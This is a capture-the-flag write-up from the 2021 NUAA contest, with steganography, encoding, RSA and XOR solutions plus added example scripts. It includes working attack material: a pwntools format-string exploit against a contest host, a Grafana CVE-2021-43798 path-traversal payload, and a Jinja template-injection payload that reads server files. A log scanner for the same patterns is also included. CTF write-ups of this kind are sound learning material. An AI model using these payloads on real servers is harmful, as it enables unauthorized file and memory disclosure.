2021NUAA-wp

Time was tight, and a few problems were just short of being solved.

Sign-in

Tencent Meeting
flag{we1c0m_t0_asur!ctf}

misc

baby_mix

Pseudo-encryption: change the 09 to 00.
A white strip is visible along the top-left edge of the image, so it is probably LSB.
Viewing it in stegsolve gives a QR code.

Scanning the QR code gives:

4a5a4a584732544748424658515654514f4634575135435447564a4749564a5347463455595754564f464c444f5752594f56465751334b55474a345841324b494b4a3546495533594b524a4449524b454b35435753334c324f4a41564153534f48424756515243574d355a464d3543474a593d3d3d3d3d3d

Convert the hex to a string:

JZJXG2TGHBFXQVTQOF4WQ5CTGVJGIVJSGF4UYWTVOFLDOWRYOVFWQ3KUGJ4XA2KIKJ5FIU3YKRJDIRKEK5CWS3L2OJAVASSOHBGVQRCWM5ZFM5CGJY======

Base32 decode:

NSsjf8KxVpqyhtS5RdU21yLZuqV7Z8uKhmT2ypiHRzTSxTR4EDWEimzrAPJN8MXDVgrVtFN

Base58 decode:

YXN1cml7aV90aGlua190aGF0X2lzX3NvX2Vhc3lfZm9yX3lvdX0=

Base64 decode:

asuri{i_think_that_is_so_easy_for_you}
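As an added example (not part of the writeup), the whole baby_mix decoding chain above in one standard-library Python script, with a small base58 decoder written inline so nothing needs to be installed. It assumes the Bitcoin base58 alphabet (the default in CyberChef and most online decoders); the hex string is the QR code content copied from above.

```python
import base64

# Bitcoin base58 alphabet: no 0, O, I or l. Assumption: the challenge used this one.
B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def b58decode(text):
    """Decode base58 text to bytes; each leading '1' becomes a leading zero byte."""
    num = 0
    for ch in text:
        idx = B58_ALPHABET.find(ch)
        if idx < 0:
            raise ValueError("not a base58 character: %r" % ch)
        num = num * 58 + idx
    body = num.to_bytes((num.bit_length() + 7) // 8, "big") if num else b""
    leading_zeros = len(text) - len(text.lstrip("1"))
    return b"\x00" * leading_zeros + body


def peel(data, layers):
    """Apply the decoders in order; every layer takes bytes and returns bytes."""
    for layer in layers:
        data = layer(data)
    return data


# QR code contents from the writeup (hex of a base32 string).
BABY_MIX_HEX = "4a5a4a584732544748424658515654514f4634575135435447564a4749564a5347463455595754564f464c444f5752594f56465751334b55474a345841324b494b4a3546495533594b524a4449524b454b35435753334c324f4a41564153534f48424756515243574d355a464d3543474a593d3d3d3d3d3d"


def decode_baby_mix():
    """hex -> base32 -> base58 -> base64 -> flag, exactly the order the writeup used."""
    return peel(BABY_MIX_HEX.encode(), [
        lambda d: bytes.fromhex(d.decode()),   # hex text   -> base32 text
        base64.b32decode,                       # base32     -> base58 text
        lambda d: b58decode(d.decode()),        # base58     -> base64 text
        base64.b64decode,                       # base64     -> flag
    ]).decode()


if __name__ == "__main__":
    print(decode_baby_mix())
```

Each layer is a plain bytes-to-bytes function, so a new encoding step is one more entry in the list; if a layer raises, the traceback tells you which stage of the chain the guess was wrong at.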

medium

Unzipping gives a key.wav file, which should be the key.
Looking at its spectrogram in Audacity gives the key MudaMudaMudaMuda.

Running strings on the image shows a string at the very end:

RjAgOUYgOTkgODMgRjAgOUYgOTIgQjUgRjAgOUYgOEMgQkYgRjAgOUYgOEUgQTQgRjAgOUYgOUEgQUEgRjAgOUYgOEMgOEYgRjAgOUYgOTAgOEUgRjAgOUYgQTUgOEIgRjAgOUYgOUEgQUIgRjAgOUYgOTggODYgRTIgOUMgODUgRjAgOUYgOTggODAgRjAgOUYgQTQgQTMgRTIgOEMgQTggRjAgOUYgOTAgOEQgRTIgOTggODAgRjAgOUYgQTUgOEIgRjAgOUYgOTggODYgRjAgOUYgOTkgODMgRjAgOUYgOEUgODMgRjAgOUYgOTAgOTggRjAgOUYgOEQgOEQgRTIgOTggODIgRjAgOUYgOUEgQUEgRjAgOUYgOEMgQUEgRjAgOUYgOTIgQjUgRjAgOUYgOUEgQTggRTIgOEMgQTggRjAgOUYgOTggODEgRjAgOUYgOTQgQUEgRTIgOUMgOTYgRjAgOUYgOEUgODggRjAgOUYgOEMgOEYgRjAgOUYgOTQgODQgRjAgOUYgOTYgOTAgRjAgOUYgQTYgOTMgRjAgOUYgOEMgOEYgRjAgOUYgOTUgQjkgRjAgOUYgOTggOEQgRjAgOUYgOTEgOEMgRjAgOUYgOEMgODkgRjAgOUYgOTIgQjUgRjAgOUYgOEYgOEUgRjAgOUYgOUEgQUIgRjAgOUYgQTQgQTMgRjAgOUYgOTYgOTAgRjAgOUYgOTIgQTcgRjAgOUYgOEQgOEQgRjAgOUYgOEMgQkYgRjAgOUYgOTggOEQgRjAgOUYgOEQgOEUgRjAgOUYgOUEgQTggRjAgOUYgOTAgOEUgRjAgOUYgOTIgQjUgRjAgOUYgOEMgQkYgRjAgOUYgOEYgQjkgRjAgOUYgOEUgODUgRjAgOUYgOTkgODMgRjAgOUYgOTEgOTEgRjAgOUYgOTggODYgRTIgOTggODMgRjAgOUYgOTAgODUgRjAgOUYgOTUgQjkgRjAgOUYgOTggODcgRjAgOUYgOEYgQjkgRjAgOUYgOEYgQjkgRjAgOUYgOEQgQjUgRjAgOUYgOEUgODggRjAgOUYgOEQgOEUgRjAgOUYgQTQgQTMgRjAgOUYgOTggODEgRjAgOUYgOEQgOEQgRjAgOUYgOUEgQTggRjAgOUYgOEYgQjkgRjAgOUYgOTEgQTMgRjAgOUYgOTQgODQgRjAgOUYgQTQgQTMgRjAgOUYgOEUgODggRjAgOUYgOTggODIgRjAgOUYgOTAgOEQgRTIgOUMgODUgRjAgOUYgOTggODAgIEUyIDlDIDg1IEYwIDlGIDlBIEFBIEYwIDlGIDk4IDhFIEYwIDlGIDk4IDgwIEYwIDlGIDk3IDkyIEYwIDlGIDk3IDkyCg==

Base64 decode:

F0 9F 99 83 F0 9F 92 B5 F0 9F 8C BF F0 9F 8E A4 F0 9F 9A AA F0 9F 8C 8F F0 9F 90 8E F0 9F A5 8B F0 9F 9A AB F0 9F 98 86 E2 9C 85 F0 9F 98 80 F0 9F A4 A3 E2 8C A8 F0 9F 90 8D E2 98 80 F0 9F A5 8B F0 9F 98 86 F0 9F 99 83 F0 9F 8E 83 F0 9F 90 98 F0 9F 8D 8D E2 98 82 F0 9F 9A AA F0 9F 8C AA F0 9F 92 B5 F0 9F 9A A8 E2 8C A8 F0 9F 98 81 F0 9F 94 AA E2 9C 96 F0 9F 8E 88 F0 9F 8C 8F F0 9F 94 84 F0 9F 96 90 F0 9F A6 93 F0 9F 8C 8F F0 9F 95 B9 F0 9F 98 8D F0 9F 91 8C F0 9F 8C 89 F0 9F 92 B5 F0 9F 8F 8E F0 9F 9A AB F0 9F A4 A3 F0 9F 96 90 F0 9F 92 A7 F0 9F 8D 8D F0 9F 8C BF F0 9F 98 8D F0 9F 8D 8E F0 9F 9A A8 F0 9F 90 8E F0 9F 92 B5 F0 9F 8C BF F0 9F 8F B9 F0 9F 8E 85 F0 9F 99 83 F0 9F 91 91 F0 9F 98 86 E2 98 83 F0 9F 90 85 F0 9F 95 B9 F0 9F 98 87 F0 9F 8F B9 F0 9F 8F B9 F0 9F 8D B5 F0 9F 8E 88 F0 9F 8D 8E F0 9F A4 A3 F0 9F 98 81 F0 9F 8D 8D F0 9F 9A A8 F0 9F 8F B9 F0 9F 91 A3 F0 9F 94 84 F0 9F A4 A3 F0 9F 8E 88 F0 9F 98 82 F0 9F 90 8D E2 9C 85 F0 9F 98 80  E2 9C 85 F0 9F 9A AA F0 9F 98 8E F0 9F 98 80 F0 9F 97 92 F0 9F 97 92

Convert the hex to characters:

🙃💵🌿🎤🚪🌏🐎🥋🚫😆✅😀🤣⌨🐍☀🥋😆🙃🎃🐘🍍☂🚪🌪💵🚨⌨😁🔪✖🎈🌏🔄🖐🦓🌏🕹😍👌🌉💵🏎🚫🤣🖐💧🍍🌿😍🍎🚨🐎💵🌿🏹🎅🙃👑😆☃🐅🕹😇🏹🏹🍵🎈🍎🤣😁🍍🚨🏹👣🔄🤣🎈😂🐍✅😀✅🚪😎😀🗒🗒

emoji-aes, with the key added.
Decrypting gives: flag{AES_1s_Gr3atS0_y0u_L1ke_1t_V3ry_Much}

questionnaire

Questionnaire; the answers, in order, are:

Naijing University of Aeronautics and Astronautics
Both are missing
Asuri
Aeronautics, astronautics, civil aviation
智周万物,道济天下 (the university motto)
Reviewed by the counselor
Jiangjun Road campus

asuri{baigei_h4ve_funnnn}

We Live in Nanjing (1): Radio Waves Across Time

Reverse the audio in Audacity and you hear some English words; write them down using the radio (NATO) phonetic alphabet.

RADIOWAVESACROSSTIME

Try2FindMe

During the contest stegosaurus (剑龙) kept throwing errors, and with time almost up I didn't look into it further.
After the contest I read a writeup and learned it was a magic number problem.
Post-contest reproduction:

The download is an archive; binwalk extracts another archive from it, which unpacks to a pyc file.
Decompile the pyc:

from Crypto.Cipher import AES
import binascii

def decrypt(x, cipher):
    # the 13 missing key characters go in front of this fixed suffix (24 bytes total)
    key = x + 'n0lve3t6r1s'
    try:
        # the decompiled code passed a str key; pycryptodome requires bytes,
        # which is the likely reason the AES step failed in the author's run
        aes = AES.new(key.rjust(24, 'A').encode(), AES.MODE_ECB)
        cipher = binascii.unhexlify(cipher)
        flag = aes.decrypt(cipher).decode()
        return flag
    except Exception:
        return ''

def main():
    c = '29426dfee9b0f158983ad996b0b7a25e3fdf85c3df187b697e3b639c64f452f21c95a941542aa530199083baf296d805'
    k = input('Please input your key: ')
    flag = decrypt(k, c)
    if 'flag' in flag:
        print('Wow, you find it!!!')
    else:
        print('Oh no!!!')

if __name__ == '__main__':
    main()

It is AES, but the first 13 characters of the key are missing.

The challenge hint: pyc steganography, Python 3.7.11.
For pyc steganography, first download stegosaurus from GitHub.

But stegosaurus has a few pitfalls to watch out for:
1. Run the script with Python 3.6.
2. The pyc header (the magic-number area) is 12 bytes for Python below 3.7 and 16 bytes for Python 3.7 and above.

Because the script from GitHub reads 12 bytes by default while the challenge was built with Python 3.7, it kept throwing errors.
Change line 123 of the script, header = f.read(12), to header = f.read(16).
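Rather than hard-coding the header size as stegosaurus does, the size can be derived from the magic number itself. The following is an added example, not stegosaurus's code and not from the writeup: it reads the little-endian version word in the first two magic bytes and picks 8, 12 or 16 accordingly, then unmarshals the code object that follows. The build_pyc helper assembles a pyc for whatever interpreter runs the script (timestamp and flags zeroed), so the demo is self-contained; the 3210 and 3390 thresholds are the magic words at which the source-size field (Python 3.3) and the PEP 552 flags field (Python 3.7) were added.

```python
import importlib.util
import marshal
import struct

# pyc header layout by the little-endian version word in the first two magic bytes:
#   < 3210       magic(4) + mtime(4)                         = 8 bytes   (Python <= 3.2)
#   3210..3389   magic(4) + mtime(4) + source size(4)        = 12 bytes  (3.3 - 3.6)
#   >= 3390      magic(4) + flags(4) + mtime+size or hash(8) = 16 bytes  (3.7+, PEP 552)
HEADER_12_MIN = 3210
HEADER_16_MIN = 3390


def pyc_header_length(data):
    """Return the header length of a pyc blob, decided by its magic word."""
    if len(data) < 4 or data[2:4] != b"\r\n":
        raise ValueError("not a pyc file: magic does not end in CR LF")
    version_word = struct.unpack("<H", data[:2])[0]
    if version_word >= HEADER_16_MIN:
        return 16
    if version_word >= HEADER_12_MIN:
        return 12
    return 8


def load_code_object(data):
    """Skip the header, whatever its size, and unmarshal the code object.

    marshal is version specific, so this only works for pycs written by
    the same interpreter line that runs this script."""
    return marshal.loads(data[pyc_header_length(data):])


def build_pyc(source):
    """Demo helper: assemble a pyc for the running interpreter with zeroed flags/mtime."""
    magic = importlib.util.MAGIC_NUMBER
    header = magic + b"\x00" * (pyc_header_length(magic + b"\x00" * 12) - 4)
    return header + marshal.dumps(compile(source, "<demo>", "exec"))


def run_pyc(data):
    """Execute the code object inside a pyc blob and return the resulting globals."""
    namespace = {}
    exec(load_code_object(data), namespace)
    return namespace


if __name__ == "__main__":
    blob = build_pyc("x = 6 * 7")
    print("header bytes:", pyc_header_length(blob), "x =", run_pyc(blob)["x"])
```

Reading a 12-byte header from a 3.7 pyc leaves the four trailing header bytes in front of the marshal stream, which is exactly the "bad marshal data" style error the writeup ran into; checking the magic first turns that into a clear decision.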

Running the script gives the missing key: k5fgb2eur5sty

But the AES decryption in the script fails. The challenge author's explanation: the final AES step may fail because of differing Python dependency versions; it's no big deal, just use an online AES decryptor.

crypto

checkin

A quick script:

d = 'oclz{loovyd_vb_l_bvnucd_hqpumj}'
e = ''
for i in d:
    if i in "{}":
        continue
    # brute-force the j whose multiplicative encryption (j * 11 mod 26) gives letter i;
    # '_' never matches, so underscores are dropped and added back by hand afterwards
    for j in range(26):
        if ((j * 11) % 26) == (ord(i) - 97):
            e = e + chr(96 + j)
            print(e)
            break


Finally, add the underscores back into the result.
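The brute-force loop above is equivalent to multiplying by the inverse of 11 modulo 26. As an added example that is not from the writeup, here is the general decryptor for this multiplicative cipher: it computes the modular inverse with extended Euclid, works for any key coprime to 26, and passes braces and underscores through unchanged so nothing has to be added back by hand. It keeps the challenge's convention, which the loop's chr(96 + j) reveals: plaintext letters are indexed a=1 ... z=26, and the ciphertext letter is the 0-based index (p * key) mod 26. The ciphertext constant is the one from the script above; encrypt_mult is included only so round trips can be checked.

```python
def modinv(a, m):
    """Modular inverse of a mod m by extended Euclid; raises if gcd(a, m) != 1."""
    r0, r1, t0, t1 = a, m, 1, 0
    while r1:
        q = r0 // r1
        r0, r1 = r1, r0 - q * r1
        t0, t1 = t1, t0 - q * t1
    if r0 != 1:
        raise ValueError("%d has no inverse mod %d" % (a, m))
    return t0 % m


def decrypt_mult(ciphertext, key=11):
    """Invert c = (p * key) mod 26 (p is the 1-based letter index) with a modular inverse."""
    inv = modinv(key, 26)           # 19 for key 11: 11 * 19 == 209 == 8 * 26 + 1
    out = []
    for ch in ciphertext:
        if "a" <= ch <= "z":
            p = (ord(ch) - 97) * inv % 26
            out.append(chr(96 + (p or 26)))   # residue 0 means p == 26, i.e. 'z'
        else:
            out.append(ch)                    # braces and underscores pass through
    return "".join(out)


def encrypt_mult(plaintext, key=11):
    """Forward direction, for round-trip checks."""
    out = []
    for ch in plaintext:
        if "a" <= ch <= "z":
            p = ord(ch) - 96                  # 1-based index, a=1 ... z=26
            out.append(chr(97 + p * key % 26))
        else:
            out.append(ch)
    return "".join(out)


# ciphertext from the checkin script above
CHALLENGE = 'oclz{loovyd_vb_l_bvnucd_hqpumj}'

if __name__ == "__main__":
    print(decrypt_mult(CHALLENGE))
```

With the 1-based convention, 'z' encrypts to residue 0 (that is, 'a'), which is why the decryptor maps residue 0 back to 'z' instead of to the non-letter chr(96) the brute-force loop would produce.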

easyRSA

First extract c1 and c2:

c2 = int(open('flag.enc2', 'rb').read().hex(), 16)
c1 = int(open('flag.enc1', 'rb').read().hex(), 16)
print(c1)
print(c2)

Common modulus attack script:

from libnum import n2s, s2n
from gmpy2 import invert

def egcd(a, b):
    """Extended Euclid: returns (g, x, y) with a*x + b*y == g."""
    if a == 0:
        return (b, 0, 1)
    else:
        g, y, x = egcd(b % a, a)
        return (g, x - (b // a) * y, y)

# modulus and the two ciphertexts extracted above
n = ...  # the modulus value was lost from the page; fill it in from the challenge files
c1 = 409050138400231971554294088177137255457866075540394361465618420085942037334914972271553348781734546381272987423855027216175678797436131073306888763180501523905135583905144901381224572922542735812959826069495112995911282269377230245515683164143316763758642080370867274365360647518283349684822272605576874844625387807047876206532634507258565110299247417968586498427727688356287596783690957837504438650897148190345700044861267114786057049491164836631033845216983588558199652913012590435836646957168387808248342739079479547784004511726635639407815336376908051269831834833967007931321906512831272657668494512124731674031937509111585885992978363095964860952405173714000880231608814695517820595229454266690556749667796735461828114590568954658520700475934939183919597602772428393159957171678913035977611490511885932486154785287709132255326686398261542844030065556598666191350007752712425713619749771672365637485154754564779267050928584728661807027994863116745339833084769533981399300503220638563466169390183736267153617583845250415885823024980144631079997094009230377992595577328633292390530018606442243369688905175147209020920954422003555782869268678894916106413862664953146515732785804502660407314901808581405034432308726147933849979689989
c2 = 660786051824910230873884600744959030265388429192727951166721113879854464522389325739802703310913732902833778034401632628938144275110259033918655077691853918758634982899427693594671785857857909036915654998761013827868199342737749405352507276436866364180154665315956829382533710951839019853169966694154970158966072113917267296101513243808003273019100867933714599898053661451818477001562112853209154906322205083636027498233807131522283087979547271774312067398759611022191882371123084261761098923994873110788704960182273817371315264655632343946622563006808101322364265578490109714246148052618988958628592753911496921563155003551926547472410642201974274781280633708636309449501619866376422440041537758514811836133804597783256003504933767151921016752120604258580059668650713822253122650687275054081288622996628277268146723350191531420962242602380839728712825405572549099787290957348706683963946075215806340393267714297975946671488782713260980129229158285210722045502442378445134853897763065681974592818004420357542042894544487694477937617156099760573978759048442186633017206146993595028297257148566673402976005517349438948032707348011387517929999285636559431700923275025083662201127580201286747957827301089492530820945594666308738557238429
e1 = 17
e2 = 65537

def common_modulus(n, c1, c2, e1, e2):
    """m = c1^s1 * c2^s2 mod n, where s1*e1 + s2*e2 == 1."""
    g, s1, s2 = egcd(e1, e2)
    # a negative coefficient is handled by inverting that ciphertext mod n
    if s1 < 0:
        s1 = -s1
        c1 = invert(c1, n)
    elif s2 < 0:
        s2 = -s2
        c2 = invert(c2, n)
    return int(pow(c1, s1, n) * pow(c2, s2, n) % n)

if __name__ == '__main__':
    print(n2s(common_modulus(n, c1, c2, e1, e2)))
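Since the modulus n did not survive on this page, the script above cannot be run as-is. As an added example (not the writeup's code), here is the same attack carried through end to end on a constructed toy key, so the identity m = c1^s1 * c2^s2 (mod n) can be checked without libnum or gmpy2: the modular inverse comes from the same extended Euclid, and the exponent pair 17 / 65537 matches the challenge. The primes and the message are constructed for the demo and are not the challenge's values.

```python
def egcd(a, b):
    """Extended Euclid: (g, x, y) with a*x + b*y == g == gcd(a, b)."""
    if a == 0:
        return (b, 0, 1)
    g, y, x = egcd(b % a, a)
    return (g, x - (b // a) * y, y)


def modinv(a, m):
    """Inverse of a mod m, from the Bezout coefficient of a."""
    g, x, _ = egcd(a % m, m)
    if g != 1:
        raise ValueError("no inverse: gcd != 1")
    return x % m


def common_modulus_attack(n, c1, e1, c2, e2):
    """Recover m from c1 = m^e1 and c2 = m^e2 (mod n) when gcd(e1, e2) == 1.

    Bezout gives s1*e1 + s2*e2 == 1, so c1^s1 * c2^s2 == m^(s1*e1 + s2*e2) == m.
    A negative coefficient is applied to the inverse of that ciphertext."""
    g, s1, s2 = egcd(e1, e2)
    if g != 1:
        raise ValueError("public exponents must be coprime")
    if s1 < 0:
        s1, c1 = -s1, modinv(c1, n)
    if s2 < 0:
        s2, c2 = -s2, modinv(c2, n)
    return pow(c1, s1, n) * pow(c2, s2, n) % n


# Constructed toy key (NOT the challenge's n): two well-known primes, same exponents.
P, Q = 1000000007, 998244353
N = P * Q
E1, E2 = 17, 65537
MESSAGE = b"rsa"   # as an integer it is below both primes, so it is coprime to N


def demo():
    """Encrypt the constructed message under both exponents, then recover it."""
    m = int.from_bytes(MESSAGE, "big")
    c1, c2 = pow(m, E1, N), pow(m, E2, N)
    recovered = common_modulus_attack(N, c1, E1, c2, E2)
    return recovered.to_bytes((recovered.bit_length() + 7) // 8, "big")


if __name__ == "__main__":
    print(demo())
```

The defensive lesson is the one the challenge is built on: a single modulus must never be used with two public exponents, because the private key is not needed at all once the same message is encrypted under both.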

reverse

IDA Start

Open it in ida64 and press Shift+F12.

flag{St4rt_t0_u3e_IDA}

Warm up

IDA analysis:
there is an XOR inside main.

main then uses one function to call another function,

and that function also contains an XOR.

Decryption script:

key = [0x56, 0x4E, 0x57, 0x58, 0x51, 0x51, 0x09, 0x46, 0x17, 0x46,
       0x54, 0x5A, 0x59, 0x59, 0x1F, 0x48, 0x32, 0x5B, 0x6B, 0x7C,
       0x75, 0x6E, 0x7E, 0x6E, 0x2F, 0x77, 0x4F, 0x7A, 0x71, 0x43,
       0x2B, 0x26, 0x89, 0xFE]
s = "qasxcytgsasxcvrefghnrfghnjedfgbhn\x00"   # the string the binary XORs with
print(len(s))
# first XOR layer: key[i] ^ (2*i + 65)
str2 = [0] * 34
for i in range(0, 34):
    str2[i] = key[i] ^ (2 * i + 65)
flag = ''
print(str2)
# second XOR layer against the string
for i in range(34):
    flag += chr(str2[i] ^ ord(s[i]))
print(flag)

pwn

format

Analysis shows the flag is stored at the address buf points to.

Find the format-string offset, then work out the offset of buf:

from pwn import *

# brute-force the argument index n at which %n$p prints our own input 'aaaa' (0x61616161)
n = 1
while 1:
    try:
        p = process('format')
        p.sendline('aaaa%' + str(n) + '$p')
        p.readuntil('aaaa')
        d = p.read()
        if b'61616161' in d:   # bytes comparison: pwntools returns bytes on Python 3
            print(n, d)
            break
        print(d)
        p.close()
    except Exception:
        pass
    n = n + 1


Use %7$s to read the data stored at the address buf points to:

from pwn import *

p = remote("118.195.147.196", 9185)
p.sendline("%7$s")
p.interactive()

thread

Top-tier unintended solution:
mashed 1111111111131111111311121131114 at random.
Recorded a video.

web

Real sign-in

A Baidu search turned up CVE-2021-43798.
Payload: /public/plugins/welcome/../../../../../../../../home/grafana/flag

baby_python

The front end must be filtering the output, so no echo is visible; use Burp Suite.

Passing {{self}} returns the template data.

Then the usual self.__class__.__base__.__subclasses__().

Look at the type class's init method by passing {{self.__class__.__base__.__subclasses__()[0].__init__}}.

After that it's the standard payload; run ls to get the file name and read it directly:

?name={{().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__['open']('flllll11111114aaaaaggggggggggggg').read()}}
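Both web challenges leave very recognisable traces in an access log: a request under /public/plugins/ that walks out of its plugin directory, and a query string carrying a Jinja expression full of introspection dunders. As an added example (not from the writeup), the following Python scans constructed log lines for both shapes. The log lines are made up for the demo; the two request paths taken from the writeup are the traversal payload and a shortened form of the SSTI payload. Decoding is repeated until the path stops changing so that double encoding (%252e) is caught, and the traversal test normalises the path and checks whether it still starts with the plugin's own directory.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed access-log lines (not from the writeup): a normal plugin asset request,
# the Grafana traversal, a double-encoded variant of it, an SSTI probe, a benign query.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Dec/2021:10:00:01 +0800] "GET /public/plugins/welcome/img/logo.png HTTP/1.1" 200 512
10.0.0.9 - - [11/Dec/2021:10:00:02 +0800] "GET /public/plugins/welcome/../../../../../../../../home/grafana/flag HTTP/1.1" 200 40
10.0.0.9 - - [11/Dec/2021:10:00:03 +0800] "GET /public/plugins/welcome/%252e%252e/%252e%252e/home/grafana/flag HTTP/1.1" 200 40
10.0.0.7 - - [11/Dec/2021:10:00:04 +0800] "GET /?name=%7B%7Bself.__class__.__base__.__subclasses__()%7D%7D HTTP/1.1" 200 88
10.0.0.5 - - [11/Dec/2021:10:00:05 +0800] "GET /?name=alice HTTP/1.1" 200 88
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')
PLUGIN_PREFIX = "/public/plugins/"
# attribute chains used to climb from a template object up to the interpreter
SSTI_RE = re.compile(
    r"\{\{.*?(__class__|__mro__|__subclasses__|__globals__|__builtins__).*?\}\}", re.S)


def fully_decode(text, rounds=3):
    """Undo percent-encoding until the text stops changing (catches %252e)."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def is_plugin_traversal(path):
    """True if a /public/plugins/<plugin>/... path escapes its plugin directory
    once decoded and normalised (the CVE-2021-43798 shape)."""
    path = fully_decode(path.split("?", 1)[0])
    if not path.startswith(PLUGIN_PREFIX):
        return False
    plugin, _, tail = path[len(PLUGIN_PREFIX):].partition("/")
    if not plugin or not tail:
        return False
    base = PLUGIN_PREFIX + plugin + "/"
    return not posixpath.normpath(base + tail).startswith(base)


def is_ssti_probe(path):
    """True if the query string carries a Jinja-style expression using introspection dunders."""
    _, sep, query = path.partition("?")
    return bool(sep) and SSTI_RE.search(fully_decode(query)) is not None


def scan_log(log_text):
    """Return (line_number, label, path) for every flagged request line."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        path = match.group(1)
        if is_plugin_traversal(path):
            hits.append((lineno, "plugin-path-traversal", path))
        elif is_ssti_probe(path):
            hits.append((lineno, "ssti-probe", path))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(*hit)
```

The normalise-then-compare check is also the server-side fix for this class of bug: resolve the requested path against the plugin directory and refuse anything whose resolved form does not stay beneath it, instead of trying to blacklist ".." spellings.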

Reference article

Twister

F12 reveals a file f111444g.php.

Visiting it, the flag is right in the response headers.


https://www.dr0n.top/posts/3470e8c1/
Author: dr0n
Published: 11 December 2021
Updated: 21 March 2024